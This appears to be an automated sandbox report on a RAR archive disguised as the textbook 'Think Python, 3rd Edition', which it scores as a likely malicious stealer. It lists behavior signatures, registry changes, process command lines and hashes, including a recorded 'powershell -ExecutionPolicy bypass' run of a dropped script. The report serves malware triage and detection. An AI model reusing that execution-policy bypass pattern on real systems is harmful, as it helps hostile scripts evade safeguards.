Malware Analysis Report

2025-01-18 22:30

Sample ID 240612-gn6nzasejn
Target A-Think Python How to Think Like a Computer Scientist, 3rd Edition).rar
SHA256 68a7a77e1e9a004bc9e823d16c808a3129b17d3600a6fc13f0d34f94f4b0c22a
Tags
execution spyware stealer pdf
score
8/10

Table of Contents

Analysis Overview
MITRE ATT&CK: Enterprise Matrix V15
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral11 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral5 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral9 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral10 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral12 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral7 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral8 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral6 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral13 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral14 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
8/10

SHA256

68a7a77e1e9a004bc9e823d16c808a3129b17d3600a6fc13f0d34f94f4b0c22a

Threat Level: Likely malicious

The file A-Think Python How to Think Like a Computer Scientist, 3rd Edition).rar was found to be: Likely malicious.

Malicious Activity Summary

execution spyware stealer pdf

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Deletes itself

Reads user/profile data of web browsers

Malformed data in PDF

Enumerates physical storage devices

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Checks processor information in registry

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-06-12 05:58

Signatures

Malformed data in PDF

pdf

Analysis: behavioral3

Detonation Overview

Submitted 2024-06-12 05:58
Reported 2024-06-12 06:00
Platform win7-20240611-en
Max time kernel 121s
Max time network 122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-2812790648-3157963462-487717889-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover3.exe"

Network

N/A

Files

memory/1912-0-0x0000000004D00000-0x0000000004D02000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted 2024-06-12 05:58
Reported 2024-06-12 06:00
Platform win7-20240221-en
Max time kernel 121s
Max time network 122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Signatures

Enumerates physical storage devices

Modifies registry class

Description | Indicator | Process | Target
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_FolderType = "{FBB3477E-C9E4-4B3B-A2BA-D3F5D3CD46F9}" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f4225481e03947bc34db131e946b44c8dd50000 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 9e0000001a00eebbfe23000010007db10d7bd29c934a973346cc89022e7c00002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020002a0000000000efbe7e47b3fbe4c93b4ba2bad3f5d3cd46f98207ba827a5b6945b5d7ec83085f08cc20002a0000000000efbe000000200000000000000000000000000000000000000000000000000100000020000000 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (int) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewVersion = "0" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (data) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\TV_TopViewID = "{82BA0782-5B7A-4569-B5D7-EC83085F08CC}" | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A

Suspicious use of SetWindowsHookEx

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe

"C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\MyCover3.exe"

Network

N/A

Files

memory/3000-0-0x0000000004C80000-0x0000000004C82000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted 2024-06-12 05:58
Reported 2024-06-12 06:00
Platform win7-20240611-en
Max time kernel 122s
Max time network 127s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ExtractAll\MyCover4.ps1

Network

N/A

Files

memory/1808-4-0x000007FEF62DE000-0x000007FEF62DF000-memory.dmp

memory/1808-5-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/1808-6-0x00000000023A0000-0x00000000023A8000-memory.dmp

memory/1808-7-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-8-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-9-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-10-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-11-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

memory/1808-12-0x000007FEF6020000-0x000007FEF69BD000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted 2024-06-12 05:58
Reported 2024-06-12 06:00
Platform win7-20240508-en
Max time kernel 119s
Max time network 120s

Command Line

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Signatures

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A

Processes

C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Network

N/A

Files

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 4e79896faedfd362e202522336b03a6b
SHA1 df0bc404811b84c8aa73187eeaa40e48ffaedb2a
SHA256 ff5d2f0ab632dd448a389cd2b693b9b573ad371362d7cd014e184b8e76429f61
SHA512 9824ef39be8434acf749621983d873ea57de0deeae5caec0d0e03b91525502082988b5282c4bf7a71a1b5216f8fb0782fb59efe9ef76ecc0551a2be7de0b52be

Analysis: behavioral10

Detonation Overview

Submitted 2024-06-12 05:58
Reported 2024-06-12 06:00
Platform win10v2004-20240611-en
Max time kernel 93s
Max time network 125s

Command Line

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

Signatures

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A

Suspicious use of FindShellTrayWindow

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 1744 wrote to memory of 1200 | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4028 | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
PID 1200 wrote to memory of 4188 | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

Processes

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ExtractAll\Readme\A-Think Python How to Think Like a Computer Scientist, 3rd Edition (True PDF).pdf"

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33AA3F51A14EA4A6C574B6C1C6A2EB55 --mojo-platform-channel-handle=1748 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A0DCC9E1456A78D09C5F5A19746463AE --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A0DCC9E1456A78D09C5F5A19746463AE --renderer-client-id=2 --mojo-platform-channel-handle=1756 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=33EBFC6C22B45F0116002F467686AA01 --mojo-platform-channel-handle=2296 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=37B050BF2611695849BF8C768AB2875B --mojo-platform-channel-handle=2416 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DDDCE9C5946990EF023C98F08E364A92 --mojo-platform-channel-handle=1952 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D68E1A1A1BD3075D9F09F3948916AA09 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context 